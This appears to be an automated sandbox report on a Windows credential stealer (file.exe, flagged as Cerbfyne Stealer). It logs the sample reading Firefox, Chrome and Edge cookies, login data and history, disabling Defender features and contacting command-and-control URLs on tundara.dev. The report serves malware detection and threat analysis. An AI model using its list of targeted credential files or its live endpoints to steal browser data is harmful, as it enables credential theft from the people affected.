              Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\2918063365piupsah.sqlite-wal
              Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.files
              Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite-shm
              Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\3561288849sdhlie.sqlite-shm
              Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\Public\AppData\Roaming\Mozilla\Firefox\Profiles
              Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\3561288849sdhlie.sqlite
              Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite
              Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\events
              Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\Public\AppData\Roaming\8pecxstudios\Cyberfox\Profiles
              Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\3561288849sdhlie.files
              Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite
              Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\jones\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting
              Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\jones\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\favicons.sqlite-shm
              Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
              Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\jones\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite
              Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\tmp
              Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\jones\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\bookmarkbackups
              Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.sqlite
              Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\security_state
              Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
              Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\Profiles
              Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\jones\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\pending_pings
              Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
              Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage
              Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\2918063365piupsah.files
              Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\jones\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\archived
              Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\jones\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\events
              Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\to-be-removed
              Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
              Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\protections.sqlite
              Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\jones\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\minidumps
              Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\jones\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\favicons.sqlite-wal
              Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\permissions.sqlite
              Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\jones\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\archived\2023-10
              Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\bookmarkbackups
              Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\jones\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release
              Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\places.sqlite-shm
              Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\default
              Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent
              Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb
              Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean
              Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.sqlite-shm
              Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.sqlite
              Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cookies.sqlite-wal
              Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\webappsstore.sqlite-shm
              Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
              Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\db
              Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite-wal
              Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb
              Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.files
              Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
              Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\jones\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\crashes
              Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting
              Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\jones\AppData\Roaming\8pecxstudios\Cyberfox\Profiles
              Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.sqlite-wal
              Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\temporary
              Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cookies.sqlite
              Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History-journal
              Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cookies.sqlite-shm
              Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\places.sqlite-wal
              Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\jones\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
              Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\jones\AppData\Roaming\Mozilla\Firefox\Profiles
              Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\favicons.sqlite-shm
              Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\favicons.sqlite
              Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\jones\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm
              Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.sqlite-wal
              Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\content-prefs.sqlite
              Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.files
              Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\webappsstore.sqlite
              Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\webappsstore.sqlite-wal
              Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\Default\AppData\Roaming\Mozilla\Firefox\Profiles
              Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\places.sqlite
              Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.log
              Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\ls-archive.sqlite
              Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
              Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\saved-telemetry-pings
              Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release
              Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\favicons.sqlite-wal
              Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\jones\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\tmp
              Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
              Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.files
              Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage.sqlite
              Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\minidumps
              Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\jones\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\db
              Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\sessionstore-backups
              Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome
              Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\jones\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-wal
              Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite-shm
              Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\crashes
              Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.sqlite-shm
              Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\jones\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean
              Source: C:\Users\user\Desktop\file.exe | Directory queried: C:\Users\Default\Documents
              Source: C:\Users\user\Desktop\file.exe | Directory queried: C:\Users\Public\Documents
              Source: C:\Users\user\Desktop\file.exe | Directory queried: C:\Users\user\Documents
              Source: C:\Users\user\Desktop\file.exe | Directory queried: C:\Users\user\Documents\HQJBRDYKDE
              Source: C:\Users\user\Desktop\file.exe | Directory queried: C:\Users\user\Documents\LHEPQPGEWF

              Remote Access Functionality

              Source: Yara match | File source: file.exe, type: SAMPLE
              Source: Yara match | File source: 0.0.file.exe.7ff608fb0000.0.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 0.2.file.exe.7ff608fb0000.0.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 00000000.00000002.1521365374.00007FF60A08C000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara match | File source: 00000000.00000000.1232496497.00007FF60A08C000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara match | File source: Process Memory Space: file.exe PID: 1408, type: MEMORYSTR
              MITRE ATT&CK Matrix (numbers in front of a technique are the count of matching signatures in this analysis; techniques without a number were not observed)

              | Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
              |---|---|---|---|---|---|---|---|---|---|---|---|---|---|
              | Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 21 Windows Management Instrumentation | 1 DLL Side-Loading | 11 Process Injection | 1 Masquerading | 1 OS Credential Dumping | 21 Security Software Discovery | Remote Services | 31 Input Capture | 1 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features |
              | Credentials | Domains | Default Accounts | 112 Command and Scripting Interpreter | Boot or Logon Initialization Scripts | 1 DLL Side-Loading | 1 File and Directory Permissions Modification | 31 Input Capture | 1 Process Discovery | Remote Desktop Protocol | 11 Data from Local System | 1 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service |
              | Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | 2 Disable or Modify Tools | Security Account Manager | 41 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | Data from Network Shared Drive | 3 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact |
              | Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 41 Virtualization/Sandbox Evasion | NTDS | 1 Application Window Discovery | Distributed Component Object Model | Input Capture | 4 Application Layer Protocol | Traffic Duplication | Data Destruction |
              | Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 11 Process Injection | LSA Secrets | 1 Remote System Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact |
              | Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 Obfuscated Files or Information | Cached Domain Credentials | 1 System Network Configuration Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
              | DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 1 DLL Side-Loading | DCSync | 1 File and Directory Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery |
              | Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | Indicator Removal from Tools | Proc Filesystem | 24 System Information Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement |

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              Behavior Graph (rendered as text; the original is an image)
              Behavior Graph ID: 1563338 | Sample: file.exe | Start date: 26/11/2024 | Architecture: WINDOWS | Score: 92
              DNS/IP info: w.tundara.dev; ip-api.com; b.tundara.dev
              Sample signatures: Multi AV Scanner detection for submitted file; Yara detected Cerbfyne Stealer; Sigma detected: Powershell Defender Disable Scan Feature; 2 other signatures
              Process: file.exe (started; graph counters 7 and 90)
                Network: ip-api.com 208.95.112.1, ports 49713, 80, TUT-ASUS United States; w.tundara.dev 51.210.106.44, ports 443, 49720, 49728, OVHFR France
                Dropped file: C:\Windows\System32\drivers\etc\hosts, ASCII
                Signatures: Uses cmd line tools excessively to alter registry or file data; Tries to harvest and steal browser information (history, passwords, etc); Modifies Windows Defender protection settings; 2 other signatures
                Child processes: powershell.exe (23, started); powershell.exe (23, started); WMIC.exe (1, started); 5 other processes
                  powershell.exe: signature Loading BitLocker PowerShell Module; child conhost.exe (started)
                  powershell.exe: child conhost.exe (started)
                  WMIC.exe: child conhost.exe (started)
                  5 other processes: children conhost.exe (started), conhost.exe (started), conhost.exe (started), 2 other processes

Antivirus detection (Source | Detection | Scanner | Label)
• file.exe | 24% | ReversingLabs | Win64.Trojan.GenSteal
• No Antivirus matches
• No Antivirus matches
• No Antivirus matches
URL detection (Source | Detection | Scanner | Label)
• https://b.tundara.dev/tapped/f9b7f1b3-b6a0-4bc1-825a-b4180e3cdc4f/reflect: | 0% | Avira URL Cloud | safe
• https://b.tundara.dev/tapped/f9b7f1b3-b6a0-4bc1-825a-b4180e3cdc4f/ZWM6ZjQ6YmI6ODI6Zjc6ZTAxOTg4Mjc0Mi0 | 0% | Avira URL Cloud | safe
• https://b.tundara.dev/tapped/f9b7f1b3-b6a0-4bc1-825a-b4180e3cdc4f/ZWM6ZjQ6YmI6ODI6Zjc6ZTAxOTg4Mjc0Mi1DQzU2LTFBNTktOTc3OS1GQjhDQkZBMUUyOUQ= | 0% | Avira URL Cloud | safe
• https://w.tundara.dev/ws?id=ZWM6ZjQ6YmI6ODI6Zjc6ZTAxOTg4Mjc0Mi1DQzU2LTFBNTktOTc3OS1GQjhDQkZBMUUyOUQ= | 0% | Avira URL Cloud | safe
Contacted domains (Name | IP | Active | Malicious | Antivirus Detection | Reputation)
• b.tundara.dev | 51.210.106.44 | true | false | - | high
• ip-api.com | 208.95.112.1 | true | false | - | high
• w.tundara.dev | 51.210.106.44 | true | false | - | high
Contacted URLs (Name | Malicious | Antivirus Detection | Reputation)
• https://b.tundara.dev/tapped/f9b7f1b3-b6a0-4bc1-825a-b4180e3cdc4f/ZWM6ZjQ6YmI6ODI6Zjc6ZTAxOTg4Mjc0Mi1DQzU2LTFBNTktOTc3OS1GQjhDQkZBMUUyOUQ= | false | Avira URL Cloud: safe | unknown
• http://ip-api.com/json/ | false | - | high
• https://w.tundara.dev/ws?id=ZWM6ZjQ6YmI6ODI6Zjc6ZTAxOTg4Mjc0Mi1DQzU2LTFBNTktOTc3OS1GQjhDQkZBMUUyOUQ= | false | Avira URL Cloud: safe | unknown
URLs found in memory or binary data (Name | Source | Malicious | Antivirus Detection | Reputation)
• https://www.ebay.co.uk/ | file.exe, 00000000.00000003.1461142106.000000C0017F3000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1479046546.000000C000395000.00000004.00001000.00020000.00000000.sdmp | false | - | high
• https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF | file.exe, 00000000.00000002.1486338572.000000C000957000.00000004.00001000.00020000.00000000.sdmp | false | - | high
• http://nuget.org/NuGet.exe | powershell.exe, 00000006.00000002.1303055043.0000021B9B134000.00000004.00000800.00020000.00000000.sdmp | false | - | high
• http://pesterbdd.com/images/Pester.png | powershell.exe, 00000006.00000002.1289484446.0000021B8B2E8000.00000004.00000800.00020000.00000000.sdmp | false | - | high
• http://schemas.xmlsoap.org/soap/encoding/ | powershell.exe, 00000006.00000002.1289484446.0000021B8B2E8000.00000004.00000800.00020000.00000000.sdmp | false | - | high
• https://www.ebay.de/ | file.exe, 00000000.00000002.1482903932.000000C000519000.00000004.00001000.00020000.00000000.sdmp | false | - | high
• http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000006.00000002.1289484446.0000021B8B2E8000.00000004.00000800.00020000.00000000.sdmp | false | - | high
• http://ocsp.thawte.com0 | file.exe | false | - | high
• https://www.amazon.com/ | file.exe, 00000000.00000003.1461142106.000000C0017F3000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1479046546.000000C000395000.00000004.00001000.00020000.00000000.sdmp | false | - | high
• https://www.ctrip.com/ | file.exe, 00000000.00000002.1479046546.000000C000395000.00000004.00001000.00020000.00000000.sdmp | false | - | high
• https://contoso.com/License | powershell.exe, 00000006.00000002.1303055043.0000021B9B134000.00000004.00000800.00020000.00000000.sdmp | false | - | high
• https://b.tundara.dev/tapped/f9b7f1b3-b6a0-4bc1-825a-b4180e3cdc4f/reflect: | file.exe | false | Avira URL Cloud: safe | unknown
• https://contoso.com/Icon | powershell.exe, 00000006.00000002.1303055043.0000021B9B134000.00000004.00000800.00020000.00000000.sdmp | false | - | high
• https://twitter.com/ | file.exe, 00000000.00000002.1482903932.000000C000519000.00000004.00001000.00020000.00000000.sdmp | false | - | high
• http://emojione.com/licensingColor | file.exe | false | - | high
• http://ip-api.com/json/DestroyEnvironmentBlock | file.exe | false | - | high
• https://discord.gg/tls: | file.exe | false | - | high
• https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br | file.exe, 00000000.00000002.1486338572.000000C000957000.00000004.00001000.00020000.00000000.sdmp | false | - | high
• https://www.olx.pl/ | file.exe, 00000000.00000003.1461142106.000000C0017F3000.00000004.00001000.00020000.00000000.sdmp | false | - | high
• https://www.youtube.com/ | file.exe, 00000000.00000002.1482903932.000000C000519000.00000004.00001000.00020000.00000000.sdmp | false | - | high
• http://dejavu.sourceforge.nethttp://dejavu.sourceforge.netFonts | file.exe | false | - | high
• https://b.tundara.dev/tapped/f9b7f1b3-b6a0-4bc1-825a-b4180e3cdc4f/ZWM6ZjQ6YmI6ODI6Zjc6ZTAxOTg4Mjc0Mi | file.exe, 00000000.00000002.1482903932.000000C000415000.00000004.00001000.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
• https://github.com/Pester/Pester | powershell.exe, 00000006.00000002.1289484446.0000021B8B2E8000.00000004.00000800.00020000.00000000.sdmp | false | - | high
• https://login.microsoftonline.com | file.exe, 00000000.00000003.1461142106.000000C0017F3000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1489672991.000000C0012FF000.00000004.00001000.00020000.00000000.sdmp | false | - | high
• https://bugzilla.mo | file.exe, 00000000.00000002.1486338572.000000C000C00000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1486338572.000000C000E7A000.00000004.00001000.00020000.00000000.sdmp | false | - | high
• http://crl.thawte.com/ThawteTimestampingCA.crl0 | file.exe | false | - | high
• https://www.zhihu.com/ | file.exe, 00000000.00000003.1461142106.000000C0017F3000.00000004.00001000.00020000.00000000.sdmp | false | - | high
• https://cdn.discordapp.com/avatars/C: | file.exe | false | - | high
• https://www.amazon.fr/ | file.exe, 00000000.00000002.1482903932.000000C000519000.00000004.00001000.00020000.00000000.sdmp | false | - | high
• https://www.msn.com | file.exe, 00000000.00000002.1486338572.000000C000C74000.00000004.00001000.00020000.00000000.sdmp | false | - | high
• http://schemas.xmlsoap.org/wsdl/ | powershell.exe, 00000006.00000002.1289484446.0000021B8B2E8000.00000004.00000800.00020000.00000000.sdmp | false | - | high
• https://contoso.com/ | powershell.exe, 00000006.00000002.1303055043.0000021B9B134000.00000004.00000800.00020000.00000000.sdmp | false | - | high
• https://nuget.org/nuget.exe | powershell.exe, 00000006.00000002.1303055043.0000021B9B134000.00000004.00000800.00020000.00000000.sdmp | false | - | high
• http://emojione.comEmojiOne | file.exe | false | - | high
• https://discord.com/api/v9/users/ | file.exe | false | - | high
• http://dejavu.sourceforge.net/wiki/index.php/Licensehttp://dejavu.sourceforge.net/wiki/index.php/Lic | file.exe | false | - | high
• https://aka.ms/pscore68 | powershell.exe, 00000006.00000002.1289484446.0000021B8B0C1000.00000004.00000800.00020000.00000000.sdmp | false | - | high
• http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000006.00000002.1289484446.0000021B8B0C1000.00000004.00000800.00020000.00000000.sdmp | false | - | high
• http://dejavu.sourceforge.net/wiki/index.php/License | file.exe | false | - | high
• https://www.google.com/ | file.exe, 00000000.00000003.1461142106.000000C0017F3000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1479046546.000000C00010A000.00000004.00001000.00020000.00000000.sdmp | false | - | high
• https://www.amazon.de/ | file.exe, 00000000.00000002.1482903932.000000C000519000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1489672991.000000C0012FF000.00000004.00001000.00020000.00000000.sdmp | false | - | high
• http://dejavu.sourceforge.net | file.exe | false | - | high
• https://www.baidu.com/ | file.exe, 00000000.00000003.1461142106.000000C0017F3000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1479046546.000000C000395000.00000004.00001000.00020000.00000000.sdmp | false | - | high
Contacted IPs (IP | Domain | Country | ASN | ASN Name | Malicious)
• 208.95.112.1 | ip-api.com | United States | 53334 | TUT-ASUS | false
• 51.210.106.44 | b.tundara.dev | France | 16276 | OVHFR | false
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1563338
Start date and time: 2024-11-26 20:37:06 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 7m 20s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 30
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: file.exe
Detection: MAL
Classification: mal92.troj.adwa.spyw.evad.winEXE@25/13@4/2
EGA Information: Failed
HCA Information: Failed
Cookbook Comments:
• Found application associated with file extension: .exe
• Excluded processes from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, WmiPrvSE.exe, svchost.exe
• Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target file.exe, PID 1408 because there are no executed functions
• Execution Graph export aborted for target powershell.exe, PID 7272 because it is empty
• Not all processes were analyzed; the report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information
• Report size getting too big, too many NtCreateFile calls found
• Report size getting too big, too many NtCreateKey calls found
• Report size getting too big, too many NtQueryValueKey calls found
